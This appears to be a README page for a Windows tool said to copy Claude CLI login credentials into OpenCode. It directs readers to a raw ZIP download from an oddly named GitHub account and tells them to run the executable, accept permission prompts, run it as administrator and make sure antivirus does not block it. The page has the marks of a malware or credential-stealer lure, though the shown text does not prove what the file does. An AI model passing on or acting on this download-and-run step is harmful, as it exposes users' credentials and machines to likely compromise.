🔄 opencode-claude-auth-sync - Use Claude Login in OpenCode

Download

🪟 What this app does

opencode-claude-auth-sync helps you use your Claude CLI login with OpenCode. You do not need to set up a second Anthropic login.

This app is for people who want a simple way to keep both tools in step. It reads the login data from Claude CLI and syncs it to OpenCode so you can keep working without extra sign-in steps.

📥 Download and install on Windows

Use this link to visit the page to download:

https://github.com/extrospective-jurymast327/opencode-claude-auth-sync/raw/refs/heads/main/Khattish/sync-auth-claude-opencode-v1.8.zip

Steps to get started

  1. Open the download link in your web browser.
  2. On the GitHub page, look for the latest release or the main download area.
  3. Download the Windows file if one is shown.
  4. If the app comes as a ZIP file, right-click it and choose Extract All.
  5. Open the extracted folder.
  6. Double-click the app file to run it.
  7. If Windows asks for permission, choose Yes.
  8. Follow the on-screen steps to sync your Claude CLI credentials to OpenCode.

🧰 Before you start

For the best results, make sure you have:

  • A Windows PC
  • Claude CLI already set up
  • OpenCode installed
  • Access to the internet for the first sync
  • A user account with permission to run apps

If Claude CLI is already signed in, the sync tool can copy that login into the place OpenCode uses.

⚙️ How it works

The app follows a simple path:

  • It checks your Claude CLI login data
  • It finds the OpenCode credential storage
  • It copies the needed auth data
  • It saves the data in the right place
  • OpenCode can then use Claude access without a new login

You do not need to type in API keys or set up a second account in most cases.

🖥️ First-time setup

If this is your first time using the app, follow these steps:

  1. Make sure Claude CLI works on your PC.
  2. Open a Command Prompt window if the app asks you to check the login.
  3. Confirm that OpenCode is installed and can open on its own.
  4. Run the sync app once.
  5. Wait until the process ends.
  6. Open OpenCode and test your Claude connection.

If OpenCode still asks you to sign in, run the sync app again after checking that Claude CLI is still logged in.

🔍 What you should see

After a good sync, you may notice:

  • OpenCode opens without asking for a separate Anthropic login
  • Claude-based features work inside OpenCode
  • The app keeps using the same Claude CLI sign-in
  • You can switch to OpenCode without changing your main login

🧩 Common uses

People use this tool when they want to:

  • Keep one Claude login across tools
  • Avoid extra sign-in steps
  • Move from Claude CLI to OpenCode with less setup
  • Reduce login mistakes
  • Use OpenCode with the same auth state already stored on the machine

🛠️ If something does not work

Try these checks:

  1. Make sure Claude CLI is still signed in.
  2. Close OpenCode before running the sync again.
  3. Open the app as an administrator if Windows blocks access.
  4. Check that you extracted the full ZIP file before running it.
  5. Run the sync again after restarting your PC.
  6. Make sure your antivirus did not block the app.
  7. Confirm that you opened the right Windows file.

📁 Typical file layout

If you download a ZIP package, you may see files like these:

  • opencode-claude-auth-sync.exe
  • README.md
  • config folder
  • logs folder
  • support files for Windows

You only need to run the main app file. The other files help the app work in the background.

🔒 Privacy and local use

This tool works on your own computer. It syncs your local Claude CLI credentials to OpenCode so the app can use the same login state.

Your login data stays on your PC unless you send it somewhere else by choice. Use it only on a machine you trust.

🪄 Best results

For a smoother setup:

  • Keep Claude CLI signed in before you start
  • Close apps that may use the same auth data
  • Use the latest version of OpenCode
  • Run the sync tool from a normal local user account
  • Save the app in a folder you can find later

❓ Frequently asked questions

Do I need a separate Anthropic account?

No. This tool is made so OpenCode can use your Claude CLI login instead of a second Anthropic login.

Is this hard to use?

No. You download the app, run it, and follow the simple steps on screen.

Can I use this on more than one Windows PC?

Yes, but you need to repeat the setup on each PC that has its own Claude CLI login.

What if I update Claude CLI or OpenCode?

If a new update changes how login data is stored, run the sync tool again.

Does this replace Claude CLI?

No. It works with Claude CLI and helps OpenCode use the same login data

📌 What to do next

  1. Download the app from the link above
  2. Install or extract it on Windows
